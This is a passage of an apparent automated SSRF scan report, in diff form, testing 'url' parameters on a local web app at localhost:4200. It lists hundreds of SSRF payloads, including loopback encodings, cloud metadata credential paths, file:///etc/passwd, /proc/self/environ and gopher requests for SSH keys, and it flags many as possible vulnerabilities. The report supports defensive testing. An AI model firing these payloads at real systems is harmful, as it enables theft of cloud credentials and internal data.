`http://localhost:4200/api/activity_types?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/activity_types?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/activity_types?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/activity_types?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/activity_types?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/activity_types?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/activity_types?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.1.3` +- Testing: `http://localhost:4200/api/activity_types?url=0` +- Testing: `http://localhost:4200/api/activity_types?url=127.1` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=localhost` +- Testing: `http://localhost:4200/api/activity_types?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/activity_types?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/activity_types?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/activity_types?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/activity_types?url=7F000001` +- Testing: `http://localhost:4200/api/activity_types?url=2130706433` +- Testing: `http://localhost:4200/api/activity_types?url=6425673729` +- Testing: `http://localhost:4200/api/activity_types?url=127001` +- Testing: `http://localhost:4200/api/activity_types?url=127_0._0_1` +- Testing: `http://localhost:4200/api/activity_types?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/activity_types?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/activity_types?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/activity_types?url=localtest.me` +- Testing: `http://localhost:4200/api/activity_types?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/activity_types?url=127.127.127.127` +- Testing: `http://localhost:4200/api/activity_types?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=0x7f000001` +- Testing: `http://localhost:4200/api/activity_types?url=017700000001` +- Testing: `http://localhost:4200/api/activity_types?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/activity_types?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/activity_types?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/activity_types?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/activity_types?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/activity_types?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/activity_types?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254` +- Testing: `http://localhost:4200/api/activity_types?url=2852039166` +- Testing: `http://localhost:4200/api/activity_types?url=7147006462` +- Testing: `http://localhost:4200/api/activity_types?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/activity_types?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/activity_types?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/activity_types?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/activity_types?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/activity_types?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/activity_types?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/activity_types?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/activity_types?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/activity_types?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/activity_types?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/activity_types?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/activity_types?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/activity_types?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/activity_types?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/activity_types?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/activity_types?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/activity_types?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/activity_types?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/activity_types?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/activity_types?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/activity_types?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/activity_types?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/activity_types?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.0` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/activity_types?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/activity_types?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/activity_types?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/activity_types?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/activity_types?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/activity_types?url=3232235521` +- Testing: `http://localhost:4200/api/activity_types?url=3232235777` +- Testing: `http://localhost:4200/api/activity_types?url=425.510.425.510` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/activity_types?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/activity_types?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/activity_types?url=instance-data` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A22` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A443` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/activity_types?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/activity_types?url=loopback` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A22` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A443` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/activity_types?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/activity_types?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/activity_types?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/activity_types?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/activity_types?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/activity_types?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/activity_types?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/activity_types?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/activity_types?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/activity_types?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/activity_types?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/activity_types?url=127.1%3A80` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/activity_types?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/activity_types?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/activity_types?url=2130706433%2F` +- Testing: `http://localhost:4200/api/activity_types?url=3232235521%2F` +- Testing: `http://localhost:4200/api/activity_types?url=3232235777%2F` +- Testing: `http://localhost:4200/api/activity_types?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/activity_types?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/activity_types?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/activity_types?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/activity_types?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/activity_types?url=0%2F` +- Testing: `http://localhost:4200/api/activity_types?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/activity_types?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/ +- Testing: `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254%2Flatest%2Fmeta-data%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A8080%2Fadmin` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A8080%2Fadmin` _(POST)_ +- Testing: `http://localhost:4200/?url=file%3A%2F%2F%2Fetc%2Fpasswd` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=file%3A%2F%2F%2Fetc%2Fpasswd` _(POST)_ +- Testing: `http://localhost:4200/?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A3000%2Fadmin` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A3000%2Fadmin` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3A3000%2Fconfig` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3A3000%2Fconfig` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A3000%2Fapi%2Finternal` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A3000%2Fapi%2Finternal` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A3000%2Frails%2Finfo` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A3000%2Frails%2Finfo` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A3000%2Flogs` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A3000%2Flogs` _(POST)_ +- Testing: `http://localhost:4200/?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=mysql%3A%2F%2Flocalhost%3A3306%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=mysql%3A%2F%2Flocalhost%3A3306%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=redis%3A%2F%2Flocalhost%3A6379%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=redis%3A%2F%2Flocalhost%3A6379%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3A9876%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3A9876%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3A54247%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3A54247%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%3A59465%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%3A59465%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2F.git%2Fconfig` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2F.git%2Fconfig` _(POST)_ +- Testing: `http://localhost:4200/?url=169.254.169.254%2Fmetadata%2Finstance` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=169.254.169.254%2Fmetadata%2Finstance` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fdocs%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fdocs%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Finternal` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Finternal` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Flogs` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Flogs` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fconfig` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fconfig` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fauth_test` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fauth_test` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Foverseer_images` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Foverseer_images` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fcampuses` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fcampuses` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fcsv` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fcsv` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fprojects` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fprojects` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fsettings` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fsettings` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fstudents` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fstudents` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fsubmission` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fsubmission` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Ftasks` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Ftasks` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fteaching_periods` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Fteaching_periods` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Ftii_actions` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Ftii_actions` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Ftii_eula` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Ftii_eula` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Ftii_hook` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Ftii_hook` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Ftutorials` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Ftutorials` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Funit_roles` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Funit_roles` _(POST)_ +- Testing: `http://localhost:4200/?url=localhost%3A4200%2Fapi%2Funits` + 